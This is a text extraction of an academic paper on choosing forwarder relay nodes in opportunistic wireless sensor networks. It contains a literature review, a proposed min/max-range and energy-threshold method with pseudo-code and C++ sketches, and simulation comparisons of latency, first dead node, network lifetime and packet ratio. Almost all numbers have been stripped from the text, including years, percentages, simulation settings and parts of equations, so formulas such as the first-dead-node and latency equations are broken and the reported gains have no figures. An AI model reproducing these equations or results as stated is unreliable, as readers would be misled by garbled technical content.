this method uses the shortest route between the source node and the destination node to select forwarder nodes. in this method, a source node will firstly broadcast a message to all the relay nodes. the relay node that has the closest distance to the destination node will be selected as the forwarder node to transmit packets. the selected forwarder node will send an acknowledgement to the source node once the packets have successfully received. after that, the forwarded node will broadcast a message to all the relay nodes, and then it will forward the packets to the relay node that has the closest distance to the destination node. the process of searching the closest relay nodes will be repeated until the packets have been delivered to the destination node. this method uses multi-path routing to forward the packets to the destination node. during the transmission, the sender node will retransmit the packets if it does not receive an acknowledgement from the forwarder node. however, the forwarder nodes and the destination node will discard any duplicate packets sent by the sender node. once the destination node has received the packets, it will send an acknowledgement to all the forwarder nodes in the path. according to the author, this method is simple and can be easily integrated with other opportunistic routing algorithms. moreover, this method can reduce the packet’s duplication problem and increase the throughput of the transmission. however, this method might consume more energy. it might produce low network lifetime because the sender nodes are required to broadcast a message to all the relay nodes for determining which relay node has the closest distance to the destination node. in , luo et al. ( ) proposed a forwarder method named energy savings via opportunistic routing (ens_or). this method uses a single-path to transmit packets. to select the forwarder node, it uses distance and energy level as in eq. ( ). p(h+i)=  (dh+i−dh) [ ∣∣dh+i−dop∣∣+eh+i−ζ ] (h+i)∈f(h),−r≤ i≤r ( ) p(h) is denoted as the current forwarder node. i is denoted as an integer starting from . (d h+i − d h) is denoted as the distance between p(h) and p(h + i). e h+i signifies the remaining energy of p (h + i). ζ signifies the value of the threshold energy. f(h) is denoted as the selected forwarder list of p(h). r signifies the maximum transmission range. the source node will construct a list based on the acceptable distance and energy level. this list will become the priority list when selecting a relay node to forward packets. once the path has determined, the packets will be sent via end-to-end transmission. according to the authors, this method can reduce energy consumption and increase the network lifetime. however, this method might decrease the network performance when the single-path is congested, or the relay node has insufficient energy to forward packets through the end-to-end transmission. yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. raman & sharma ( ) proposed a forwarder method named energy optimization opportunistic routing (eno_or). this method uses energy level and distance to select a forwarder node. initially, the default threshold energy level is pre-configured. any relay node that reaches the default threshold energy level will have a chance to be selected the forwarder node. however, priority will be given to the relay node that has the highest energy level and optimal distance. the optimal distance is determined using eq. ( ). 
dop= m−xh nop = { ea[ (ϕ− )eβ ]} ϕ ( ) dop is denoted as the optimal transmission distance. m is denoted as the position of the forwarder node. xh is denoted as the position of the relay node. n is the index of the relay node. eβ is denoted as the energy required for the packet transmission. ϕ is denoted as the transmission loss due to link failure. according to the author, this method can increase the network lifetime by using the pre-configured energy threshold level and optimal distance. however, if the available relay nodes do not meet the minimum pre-configured threshold energy level, this method will use direct packets transmission to transmit packets to the destination node which might consume more energy. hasnain, malik & aydin ( ) proposed a forwarder method named adaptive opportunistic routing (aor). in this method, the forwarder node is selected based on minimum energy consumption and the link quality. in order to deliver the packets from the source node to the destination node, this method uses optimal route selection. to select the optimal route, it uses minimum energy consumption and maximum link quality. energy consumption is calculated based on the size of the packet delivered and the distance covered from the source node to the forwarder node. to determine the maximum link quality for forwarding the packets, this method uses the probability. equation ( ) shows the formula used to calculate energy consumption. et (p,d)= { p ( ee+γfs x d ) if d≤rc p ( ee+γmp x d ) if d ≥rc ( ) et is denoted as the transmission range. p is denoted as the packet size. ee is denoted as the overall energy consumption for the packet transmission. γfs is denoted as the forwarder node location. d is donated as an ideal range where packets can be successfully transmitted. γmp is denoted as the distance between the source node and the relay node. rc is denoted as the maximum range to select the forwarder node. equations ( ) and ( ) are used to calculate the link quality. these two equations are used to calculate the probability of the forwarding packets via a particular route and the progress of the forwarded packets at the route respectively. padv (r)=adv (r)x prob (r d s ,p) ( ) adr(r)=d(s,d)−d(s,r) ( ) yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. padv is donated as the probability of the packet delivery through route r, which is established based on the broadcast messages among the relay nodes. prob ( rds ,p ) is denoted as the probability of the successful packets delivered from the source node to the destination node. adv(r) is donated as the progress of the forwarded packets thought route r. d(s,d) is donated as the total distance from the source node to the destination node. d(s,r) is donated as the distance of the possible forwarder node from the source node. according to the authors, this method can minimize energy consumption when forwarding the packets using the optimal route selection. however, this method only uses single-path and end-to-end transmission. as a result, it might increase the latency and end-to-end delay when the relay node has insufficient energy or the link quality is poor. khan et al. ( ) proposed a forwarder method named cooperative energy efficient optimal relay selection (co-eeors). this method produces reliable packet delivery. the forwarder node is selected based on the lowest depth and the value of the lowermost location. 
the value of the location interfaces and measures the distance between the source node and the destination node. relay nodes that are located closest to the destination node will have a smaller value of the location. a relay node is selected as a forwarder node to forward the packets if it is closest to the destination node. the destination node sends an acknowledgement to the source node after receiving the packets successfully. according to the author, the proposed method achieved a higher receiving packets ratio as compared to other forwarder methods. however, there is a limitation with regards to the performance of co-eeors, and this seems an exceptional condition. it occurs when there is a larger distance between the relay nodes, and when the source nodes can not find the forwarder nodes, thus cooperation fails due to link failure. as a result, this method could increase overhead and latency. li et al. ( ) proposed a forwarder method named multi-hop wireless networks (mwn). in this method, the forwarder node is selected using energy-efficient metric. the energy-efficient metric is comprised of several parameters such as one-hop distance (r ,t ), transmission range (r ,t ), and the distance between the relay node and the destination node (dt ). the average forwarding distance and the total energy consumption are calculated for each hop using eq. ( ) and the energy consumption for each hop is calculated using eq. ( ). d(n)=min ≤i≤n{di} ( ) di is denoted as the distance between the relay node i and the destination node. if the relay node i successfully decodes the packet, di will be given a value equals to the euclidean distance from i to the destination node. otherwise, di will be given a value equal to dt . eall ( r ,t,r ,t ) = [ e +ect +stpecr ] ∗l, ( ) r is denoted as the radius of the relay node. e is denoted as the packet transmitting energy per bit. stp is denoted as the size of the forwarding area. ect and ecr are denoted as the transmitter and the receiver circuit energy consumption per bit for each relay node respectively. yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. according to the authors, the use of the energy-efficient metrics can optimize the average forwarding distance with minimum energy consumption. however, the forwarder node in this method is selected dynamically. as a result, the selected forwarder nodes might have insufficient energy to forward the packets. when this situation happens, the packet receiving ratio will be decreased. chithaluru, tiwari & kumar ( ) proposed a forwarder method named adoptive ranking based energy-efficient opportunistic routing (areor). this method uses single path and end to end transmission to transmit the packet from source node to destination node. it selects the best relay node to take an interest as a cluster head by utilizing versatile participatory criteria. forwarder node is selected based on an adoptive ranking system. relay nodes ranking is determined by computing the remaining energy and location closest to the destination node. according to the author, this method reduces energy consumption by using the adoptive ranking and optimal energy node selection. however, in this method, the forwarder node is selected based on the cluster and adoptive ranking system. network performance will be decreased if available nodes have insufficient energy to forward the packets. zhang et al. 
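to make the shape of such a per-hop energy metric concrete, the following c++ sketch (our illustration, not the implementation of li et al.; the type names, function names, and parameter values are assumptions) computes the energy spent on one hop as the per-bit transmit and transmitter-circuit energies plus the receiver-circuit energy of every node in the forwarding area, scaled by the packet length in bits.

#include <cstdio>

struct RadioParams {
    double txEnergyPerBit;   // e: radiated energy per bit (joules per bit), assumed value
    double txCircuitPerBit;  // ect: transmitter circuit energy per bit
    double rxCircuitPerBit;  // ecr: receiver circuit energy per bit
};

// energy spent on one hop when 'receiversInArea' relay nodes overhear the packet
double perHopEnergy(const RadioParams& p, int receiversInArea, int packetLengthBits) {
    double perBit = p.txEnergyPerBit + p.txCircuitPerBit
                  + receiversInArea * p.rxCircuitPerBit;
    return perBit * packetLengthBits;
}

int main() {
    RadioParams p{50e-9, 50e-9, 50e-9};   // illustrative figures, not taken from the paper
    std::printf("per-hop energy: %.3e J\n", perHopEnergy(p, 4, 1024));
    return 0;
}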
( ) proposed a forwarder method named shortest-latency opportunistic routing in asynchronous wsns. this method theoretically examines the techniques on how to select a forwarder node in asynchronous wireless sensor networks (wsns). the proposed approach develops the probability for the relay node to be selected as a forwarder node. this method uses single-path and hop-by-hop transmission to transmit packets from the source node to the destination node. according to the author, end-to-end latency for opportunistic routing in asynchronous wsns is theoretically achieved in this approach. however, this method might decrease network performance, and to determine the real implications of this approach in terms of energy efficiency, the proposed approach needs to be implemented in practice. wang ( ) proposed a three-layer framework that uses multiple mobile sinks with a fog structure. the proposed framework aims to break the bottleneck of data collection from wsns to the cloud. the framework was compared with various existing traditional solutions. the experimental result reveals that the framework can help in the improvement of throughput and the reduction of transmission delay. liang ( ) proposed a reliable trust computing mechanism (rtcm). the mechanism helps in enhancing the reliability and efficiency of data transfer to the cloud. the result shows some promise. thakkar and kotecha proposed a routing algorithm that utilizes an energy-delay index for a trade-off to optimize both objectives, energy and delay (thakkar, a; thakkar, b). the result shows that the proposed algorithm performs well. thakkar and kotecha further proposed a cluster formation technique with a decentralized cluster head election method (thakkar, ). the authors used bollinger bands to elect a cluster head. the result shows significant improvement. in another study by thakkar, the author proposed an advanced leach protocol named deal (thakkar, ). the protocol takes the energy and distance of a node into consideration during the cluster head election process. the result shows that the proposed protocol enhances the stability period in comparison to the existing state-of-the-art. furthermore, thakkar also published two more studies in this research theme (thakkar, a; thakkar, b; thakkar, ). table shows the synthesis of the selected related work. from the review, we noticed that most of the existing forwarder methods produce an early first dead node, high latency, high energy consumption, and a shorter network lifetime. several factors cause these weaknesses. for example, some of the forwarder methods do not consider the energy level, and they always need to broadcast messages to all the relay nodes when determining the forwarder node. as a result, these types of forwarder methods might cause the relay node to die quickly or drop the received packet due to insufficient energy. moreover, some of the forwarder methods use unicast, single-path, and end-to-end transmission to transmit packets. these types of transmissions might increase the latency and end-to-end delay when the relay node has insufficient energy, the link quality is poor, or the path is congested. from these review results, it is shown that there is still room for improvement in this domain, especially in the aspects of latency, first dead node, network lifetime, and receiving packets ratio.
thus, this research was carried out to propose a relay node selection method to improve the drawbacks above. materials & methods in this section, the simulation settings used by luo et al. ( ) to evaluate the proposed method are presented. the simulation is conducted in omnet++ simulator and mixim framework. the proposed method and the related works are simulated using the simulation settings in table . omnet++ and mixim are chosen because they have the required libraries such as stdio.h, string.h, omnetpp.h, ‘‘bs.h’’, ‘‘node.h’’, ‘‘cl_msg_m.h’’, ‘‘gesteb.h’’, and c utvector class which are required when implementing the proposed method and the related works (bouachir et al., ; zhao, mosler & braun, ). the simulation is carried out in an area of m network size with nodes that are uniformly deployed. the network consists of one source node, one destination node, and relay nodes. the maximum range between relays nodes is m, while the minimum range is m. the packet size , bit is used for transmission. the initial threshold energy level is set as %. the sending rate is one packet per second. the simulation time is set s and adopted from luo et al. ( ). the simulation is executed times for each result, as suggested by ritter et al. ( ). the simulation results are collected individual and manually, and ‘‘r’’ program is used to compare the results proposed methods to provide a clear overview, a high-level description of the proposed method is described in this section. to ease the explanation, we pre-configured the threshold energy and the energy level for each relay node before demonstrating how a given packet is sent from the source node to the destination node. initially, the source node will select a relay node to forward a packet based on the distance and the energy level. in the previous studies, some methods used either distance or energy level to perform routing. moreover, several researchers (hawbani et al., ; kannan & raja, ; nadar et al., ) reported that yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of selected related works. forwarder method year routing mechanism forwarding list selection advantages disadvantages geraf (zorzi & rao, ) multi-path hop-by-hop � reduce latency. � decrease network lifetime. exor (biswas & morris, ) single-path end-to-end � increase throughput. � increase overhead. eeor (mao et al., ) single-path end-to-end � minimize energy consumption. � increase network lifetime. � produce high first dead node. short-haul (lee & haas, ) multi-path hop-by-hop � increase throughput � reduce the ratio of the duplication packets. � produce high energy consumption. � decrease network lifetime. ens_or (luo et al., ) single-path end-to-end � minimize energy consumption. � increase network lifetime. � decrease network performance. eno_or (raman & sharma, ) single-path hop-by-hop � increase network lifetime. � consume more energy. aor (hasnain, malik & aydin, ) single-path end-to-end � minimize energy consumption. � increase latency. � end-to-end delay. co-eeors (khan et al., ) single-path end-to-end � increase receiving packets ratio. � increase overhead. � increase latency. mwn (li et al., ) single-path hop-by-hop � minimize energy consumption. � decrease receiving packets ratio. areor (chithaluru, tiwari & kumar, ) single-path end-to-end � reduce energy consumption. � decrease network performance. shortest-latency (zhang et al., ) single-path hop-by-hop � reduce latency. 
� decrease network performance. wang et al. (wang, ) single-path hop-by-hop � minimize energy consumption. � increase latency. liang et al. (liang, ) multi-path hop-by-hop � increase throughput. � decrease network lifetime. thakkar and kotecha (thakkar, a; thakkar, b) multi-path hop-by-hop � increase network lifetime. � reduce the ratio of the duplication packets. � decrease network lifetime. thakkar and kotecha (thakkar, ) multi-path hop-by-hop � minimize energy consumption. � reduce latency. � decrease network performance. thakkar (thakkar, ) single-path end-to-end � minimize energy consumption. � increase latency. thakkar and kotecha (thakkar, a; thakkar, b) multi-path hop-by-hop � minimize energy consumption. � reduce latency. � decrease network performance. thakkar (thakkar, ) multi-path hop-by-hop � minimize energy consumption. � reduce latency. � decrease network performance. yee etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table simulation settings. parameter values network size m× m node deployment uniform number of nodes source node destination node relay nodes maximum range m minimum range m packet size , bit threshold energy level % sending rate packet/s simulation time s distance and energy levels are the most commonly used metrics to select the best relay node. therefore, we used and improvised these two metrics in our proposed method to select a relay node. in our proposed method, the selected relay node is called the forwarder node. the source node will forward the packet to the forwarder node. after transmitting the packet, the energy level of the source node will be reduced based on the distance covered and the size of the packet delivered during the transmission. the current forwarder node will use the same mechanism to select another relay node to become the next forwarder node. similarly, the energy level of the current forwarder node will be reduced after the packet is transmitted to the next forwarder node. this process will be repeated until the packet reaches the destination node. hence, the proposed method has a distributed architecture. proposed method illustration assuming that a source node (s) is going to transmit a packet to a destination node (d), and the pre-configured threshold energy level is set as %. in our proposed method, s will first use the minimum range to search for an available relay node to become the forwarder node (see fig. ). equation ( ) is adopted from alia & al-ajouri ( ) to calculate the minimum range. dminr min(i,l)d(si,sl)√ w m+h m ( ) min(i,l)d(si,sl) is the minimum distance between relay nodes. √ w m+h m is the maximum length between any two relay nodes which can be represented by the diagonal length of the monitored field. since there is more than one relay node with a threshold energy level more than or equal to %, therefore, the proposed method will give higher priority to the relay node that has the highest energy level. if there is a tie, the nearest distance will become the second priority for the selection process. if there is no relay node fulfils the minimum threshold energy level ( %), the proposed method will use the maximum range to search for any yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure determine a forwarder node using the minimum range. full-size doi: . /peerjcs. /fig- suitable relay nodes to become the forwarder node. 
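before continuing the worked example, the selection rule just described can be sketched in c++ as follows: relay nodes inside the minimum range that meet the threshold are preferred, ties on the energy level are broken by the shortest distance, and the maximum range is tried only when the minimum range yields no candidate. this sketch is our reading of the rule for illustration only, not the authors' omnet++ implementation, and all type and function names are assumptions.

#include <optional>
#include <vector>

struct Relay {
    int id;
    double distance;   // distance from the current sender node
    double energy;     // residual energy level, e.g. as a percentage
};

// pick the best eligible relay inside 'range': highest energy, then nearest distance
std::optional<Relay> pickWithinRange(const std::vector<Relay>& relays,
                                     double range, double threshold) {
    std::optional<Relay> best;
    for (const Relay& r : relays) {
        if (r.distance > range || r.energy < threshold) continue;   // not eligible
        if (!best || r.energy > best->energy ||
            (r.energy == best->energy && r.distance < best->distance))
            best = r;
    }
    return best;
}

// try the minimum range first and fall back to the maximum range
std::optional<Relay> selectForwarder(const std::vector<Relay>& relays,
                                     double minRange, double maxRange,
                                     double threshold) {
    if (auto r = pickWithinRange(relays, minRange, threshold)) return r;
    return pickWithinRange(relays, maxRange, threshold);
}

int main() {
    std::vector<Relay> relays{{1, 10.0, 80.0}, {2, 12.0, 80.0}, {3, 25.0, 95.0}};
    auto f = selectForwarder(relays, 15.0, 30.0, 75.0);
    return (f && f->id == 1) ? 0 : 1;   // relay 1 wins: same energy as relay 2 but nearer
}

when neither range yields a candidate, the method lowers the threshold energy level, as the example below goes on to show.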
in this example, the relay node that has a % energy level is selected as the forwarder node. to find the next forwarder node, the proposed method will use the minimum range to search for an available relay node that fulfils the minimum energy level threshold ( %). since no relay node fulfils the minimum energy level threshold, the proposed method then uses the maximum range to search for any suitable relay nodes to become the next forwarder node (see fig. ). equation ( ) is adopted from luo et al. ( ) to calculate the maximum range. dop = m − xh = { ( eelec) / [ (τ − )εamp ] } /τ ( ) dop is the optimal transmission distance. m is the index of a relay node. xh is the position of the relay nodes. eelec is the energy consumption of the relay node during transmission. εamp is the energy dissipated in the transmit amplifier. τ is the channel route-loss exponent of the antenna. d is the distance between the current forwarder node and the next forwarder node. in this example, the relay node that has a % energy level is selected as the next forwarder node. the energy level of the previous forwarder node will be reduced after the packet is transmitted to the next forwarder node. to find the next forwarder node, the same mechanism is used. the proposed method will first use the minimum range to search for an available relay node that fulfils the minimum threshold energy level. since there are two relay nodes with the same energy level ( %), the nearest distance will become the second priority for the selection process (see fig. ). in this example, the relay node that is closest to the current forwarder node is selected as the next forwarder node. the energy level of the previous forwarder node will be reduced after the packet is transmitted to the next forwarder node. to find the next forwarder node, the proposed method will use the minimum range to search for an available relay node that fulfils the minimum threshold energy level (see fig. ). since no relay node fulfils the minimum threshold energy level, the proposed method then uses the maximum range to search for any suitable relay nodes to become the next forwarder node. figure determine a forwarder node using the maximum range. figure determine a forwarder node using the nearest distance. since no relay node fulfils the threshold energy level within the maximum range either, the proposed method will reduce the threshold energy level using eq. ( ). thenergy = thenergy × ( ere / ein ), if n ∈ g ( ) thenergy is the threshold for the energy level, ere is the residual energy of the relay node. ein is the initial energy of the relay node. g is the set of all the relay nodes. assuming that the new threshold energy level after the calculation is %, a broadcast message will be sent to notify each of the relay nodes about the new threshold level. the proposed method then continues using the minimum range to search for an available relay node that fulfils the new threshold energy level. in this example, the relay node that has the highest energy level is selected as the next forwarder node. the energy level of the previous forwarder node will be reduced after the packet is transmitted to the next forwarder node.
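a minimal c++ sketch of this threshold adjustment is given below. it is our illustration with assumed names, not the authors' code; the equation above only fixes the scaling factor as the ratio of residual to initial energy, so taking that ratio from the best-preserved relay node is an assumption made here to keep the example concrete.

#include <algorithm>
#include <cstdio>
#include <vector>

struct NodeEnergy {
    double residual;   // ere: remaining energy of the relay node
    double initial;    // ein: energy the node started with
};

// scale the threshold down by a residual/initial energy ratio; using the
// largest ratio among the relay nodes is an assumption, chosen so that the
// threshold stays as high as the best-preserved node allows
double reduceThreshold(double threshold, const std::vector<NodeEnergy>& nodes) {
    double bestRatio = 0.0;
    for (const NodeEnergy& n : nodes)
        bestRatio = std::max(bestRatio, n.residual / n.initial);
    return threshold * bestRatio;
}

int main() {
    std::vector<NodeEnergy> nodes{{40.0, 100.0}, {65.0, 100.0}};
    double newThreshold = reduceThreshold(70.0, nodes);   // 70% * 0.65 = 45.5%
    std::printf("new threshold: %.1f%%\n", newThreshold);
    return 0;
}

the new threshold would then be broadcast to the relay nodes and the minimum-range search repeated, as described above.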
/fig- http://dx.doi.org/ . /peerj-cs. figure determine a forwarder node by decreasing the threshold energy level. full-size doi: . /peerjcs. /fig- figure transmit a packet to the destination node. full-size doi: . /peerjcs. /fig- the current forwarder node continues to search for the next available relay node within the minimum range to forward the packet. since the destination node is within the minimum range, the packet will deliver to the destination node (see fig. ). in this example, a packet only required six hops to transmit from a source node to a destination node using the proposed method (see fig. ). the pseudo-code and the flowchart of the proposed method are shown in figs. and , respectively. results the proposed method and other related works are evaluated based on the following routing metrics: latency (l): l is used to determine the average time of the packets that are successfully delivered to the destination node. yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure paths of the packet transmitted using the proposed method. full-size doi: . /peerjcs. /fig- first dead node (fdn): fdn is defined to measure the network connectivity and to check the appearance of the first dead node in the network. network lifetime (nl): nl is used to determine the energy consumption and network partition. fdn and nl are essential metrics to increase the network lifetime. receiving packets ratio (rpr): rpr is used to determine the total number of packets that are successfully received by the destination node. these aspects are used because this is the main focus of our research work. moreover, the other related works also used the same metrics for evaluation (hasnain, malik & aydin, ; luo et al., ; raman & sharma, ). therefore, we believe the evaluation and comparison can be carried out fairly. the details of each result analysis are discussed in the following subsections. result analysis for latency (l) figure illustrates the packet delivery latency comparison among the proposed method and the other related works. packet delivery latency is calculated based on the formula used by liang, luo & xu ( ) (see eq. ( )). this equation is used because it is the standard formula used to calculate the latency (l) in the opportunistic network (liang, luo & xu, ). l= n∑ i= (tcontention(k)+tdata)+(n − ) ( ) ∑n i= (x) is the summation for all relay nodes, x is the parameters, t contention(k) is the contention time, tdata is the packet transmission time, n is the number nodes. the simulation results shown that our proposed method has the lowest packet delivery latency followed by adaptive opportunistic routing (aor), energy optimization opportunistic routing (eno_or), energy savings via opportunistic routing (ens_or), opportunistic multi-hop routing (exor), geographic random forwarding (geraf) and energy-efficient opportunistic routing (eeor). on average, our proposed method yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. algorithm: relay node selection and packet forwarding s = source node f = forwarder node n = node e = energy d = destination event: s has a packet to send to the d. /*steps*/ . set threshold energy level . s select minimum range . check e for ns . if (threshold energy level ≥ the energy level of the nodes) then . do . check n with highest e . select n with highest e . 
goto ; . else . if (more than one n with equal e) then . do . select the nearest n . set as f . s forward the packet to f . s e will be reduced . if (packet reaches to d) . end . else . goto ; . endif . else . s select maximum range . check e for ns . if (threshold energy level ≥ the energy level of the nodes) then . do . goto ; . else . reduce threshold energy level . goto ; . endif . endif . return figure the pseudo code of the proposed method. full-size doi: . /peerjcs. /fig- yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure flowchart of the proposed method. full-size doi: . /peerjcs. /fig- yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure latency comparison. full-size doi: . /peerjcs. /fig- produces approximately . %, . %, . %, . %, . %, and . % lesser packet delivery latency compared to aor, eno_or, ens_or, exor, geraf and eeor respectively. the reason that our proposed method could perform better compared to other methods might due to the minimum or maximum range selection mechanism used. in the best case scenario, if all the forwarder nodes fulfilled the required threshold energy and used the minimum range to forward the packets, the packets could be delivered without further delay. result analysis for first dead node (fdn) figure illustrates the first dead node comparison among our proposed method and the other related works. first dead node is calculated based on the formula used by ren et al. ( ) (see eq. ( )). this equation is used because it is the standard formula used to calculate the first dead node (fdn) in the opportunistic network (ren et al., ). fdn = [ e max( )ex ] ( ) e is the initial energy of the relay node. max ( ) ex is the maximum energy consumption of the relay node. the simulation results shown that our proposed method has the highest simulation time for the first dead node followed by aor, eno_or, ens_or, exor, geraf and eeor. on average, our proposed method produces approximately . %, . %, . %, . %, . %, and . % longer simulation time for the first dead node compared to aor, eno_or, ens_or, exor, geraf and eeor respectively. the reason that our proposed method could perform better compared to other methods might due to the optimum energy level selection mechanism used. averagely, in our proposed method, if a relay node was selected to forward a packet, it normally would not be selected again in yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure first dead node comparison. full-size doi: . /peerjcs. /fig- the subsequence round to forward a packet unless it has the highest energy level among the other relay nodes and still fulfill the required threshold energy level. therefore, our proposed method could prolong the time of the first dead node at the same time we could still select the best relay node to forward the packet. result analysis for network lifetime (nl) figure illustrates the network lifetime comparison among our proposed method and the other related works. network lifetime is calculated based on the formula used by ren et al. ( ) (see eq. ( )). this equation is used because it is the standard formula used to calculate the network lifetime (nl) in the opportunistic network (ren et al., ). 
nl = ne − ∑_{c= }^{i} ∑_{j= }^{n} ( e(i)j ∗ l(i) ) ( ) ne is the initial energy of the network, ∑_{c= }^{i} ∑_{j= }^{n} ( e(i)j ∗ l(i) ) is the remaining energy of the network. e(i)j is the average energy consumption of the relay node. l(i) is the duration of the relay node. the simulation results showed that our proposed method has the highest network lifetime followed by aor, eno_or, ens_or, exor, geraf and eeor. on average, our proposed method produces approximately . %, . %, . %, . %, %, and . % higher network lifetime compared to aor, eno_or, ens_or, exor, geraf and eeor respectively. the reason that our proposed method could perform better compared to other methods might be due to the selection mechanism used in our proposed method, which is based on the nearest distance followed by the highest energy level. moreover, our proposed method could reduce the threshold energy level if a suitable relay node could not be found after using the minimum/maximum range as well as the existing threshold energy level. therefore, our proposed method could prolong the network lifetime. figure network lifetime comparison. result analysis for receiving packets ratio (rpr) figure illustrates the receiving packets ratio comparison among the proposed method and the other related works. receiving packets ratio is calculated based on the formula used by ren et al. ( ) (see eq. ( )). this equation is used because it is the standard formula used to calculate the receiving packets ratio (rpr) in the opportunistic network (ren et al., ). rpr = ∑rdp / ∑sdp ( ) ∑rdp is the total number of packets received by the destination node. ∑sdp is the total number of packets sent to the destination node. the simulation results showed that our proposed method has the highest receiving packet ratio followed by aor, eno_or, ens_or, exor, geraf and eeor. on average, our proposed method produces . %, . %, . %, %, . %, and . % higher receiving packets ratio compared to aor, eno_or, ens_or, exor, geraf and eeor respectively. figure receiving packets ratio comparison. the reason that our proposed method could produce a higher receiving packets ratio compared to other methods might be due to the selection mechanism used in our proposed method, which is based on the nearest distance followed by the highest energy level. additionally, our proposed method could reduce the threshold energy level if no suitable relay node could be found after using the minimum/maximum range as well as the existing threshold energy level. as a whole, the simulation results showed that our proposed method was able to perform better than the related works because of the following reasons: (i) our proposed method could use a relay node that fell within the minimum range to forward the packet if the relay node has the highest energy level. therefore, it would reduce the latency when delivering the packet to the destination node. (ii) the optimum energy level selection mechanism used in our proposed method could reduce the chances of a forwarder node taking part in forwarding a packet again unless it still has the maximum energy level compared to the other relay nodes. therefore, it will prolong the time of the first dead node.
(iii) our proposed method could reduce the threshold energy level from time to time if no suitable relay node is found. our selection mechanism could use the new threshold energy level together with the minimum/maximum range searching mechanism to determine a suitable relay node. as a result, our proposed method could prolong the network lifetime and produce a higher receiving packet ratio. conclusions and future work in this paper, an improved relay node selection method was proposed. the proposed method uses the minimum or maximum range and the optimum energy level to select the best relay node to forward the packet, with the aim of improving the performance of routing in the opportunistic network. in our proposed method, the threshold energy level needs to be pre-configured. after that, our proposed method will use the minimum range to determine a forwarder node. the maximum range will only be used if no relay node fulfills the minimum threshold energy level within the minimum range. to select the forwarder node, priority is given to the node that has the highest energy level. if there is a tie, the nearest distance will become the second priority for the selection process. if no relay nodes meet the minimum threshold energy level, the proposed method reduces the threshold energy level and uses the same mechanism to determine a forwarder node. a broadcast message is sent to notify all the relay nodes about the new threshold level. this process is repeated until a packet is forwarded to the destination node. several simulations were conducted to evaluate the proposed method based on l, fdn, nl, and rpr. the results showed that our proposed method could (i) produce lower latency, (ii) prolong the time for the first dead node, (iii) improve the network lifetime, and (iv) produce a higher receiving packet ratio compared to other methods. for future work, we intend to investigate whether it is practical to integrate our proposed method with "network coding". zhai et al. ( ) proposed the "network coding" technique in . according to the authors, "network coding" is a technique that can be used to forward more than one packet/message in each transmission. as a result, an assumption was made that by integrating the proposed method with "network coding", the performance of routing in the opportunistic network could be improved. therefore, in the future, more research would be carried out in this area. besides, we intend to investigate whether it is practical to integrate our proposed method with cognitive radio networks (crns). kafaie et al. ( ) proposed the crns technique in . crns is a paradigm of wireless communication that allows unlicensed secondary users to adjust their transmission parameters in order to achieve efficient usage of radio spectrum resources without any harmful interference to the licensed primary user. crns are getting more and more popular in the opportunistic network because they provide dynamic spectrum access, and more efficient and secure data transmission (kafaie et al., ). an assumption was made that by integrating our proposed method as one of the features or libraries in crns, it might open up more avenues for researchers in this domain. however, the proposed method might not fit well in the current routing metrics in crns.
therefore, in the future, more researches would be carried out to enable our proposed method to be embedded as one of the feature or library in crns. abbreviations the following abbreviations are used in this manuscript: aor adaptive opportunistic routing areor adaptive ranking based energy-efficient opportunistic routing co-eeors cooperative energy efficient optimal relay selection crns cognitive radio networks d destination node e energy eeor energy efficient opportunistic routing eno_or energy optimization opportunistic routing ens_or energy savings via opportunistic routing ett expected transmission time etx expected transmission count exor opportunistic multi-hop routing f forwarder node fdn first dead node geraf geographic random forwarding l latency mixim mixed simulator min-max range minimum and maximum range mwn multi-hop wireless networks n node yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. nl network lifetime omnet++ objective modular network testbed in c++ or opportunistic routing rpr receiving packets ratio s source node shortest-latency shortest-latency opportunistic routing in asynchronous wsns short-haul short-haul multi-hop wsns wireless sensor networks additional information and declarations funding this work was supported by the bantuan khas penyelidikan (bks - ) from the university of malaya, malaysia, postgraduate research grant under grant pg - a and also the fundamental research grant scheme (fp - a) from the ministry of higher education, malaysia. this work was also supported by king saud university, riyadh, saudi arabia, through researchers supporting project number rsp- / . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: university of malaya, malaysia: bks - . postgraduate research grant: pg - a. fundamental research grant scheme from the ministry of higher education, malaysia: fp - a. king saud university, riyadh, saudi arabia: rsp- / . competing interests the authors declare there are no competing interests. author contributions • por lip yee conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • shahid mehmood performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • ahmad almogren analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • ihsan ali performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. • mohammad hossein anisi analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code is available in the supplemental files. yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references alia o, al-ajouri a. . maximizing wireless sensor network coverage with minimum cost using harmony 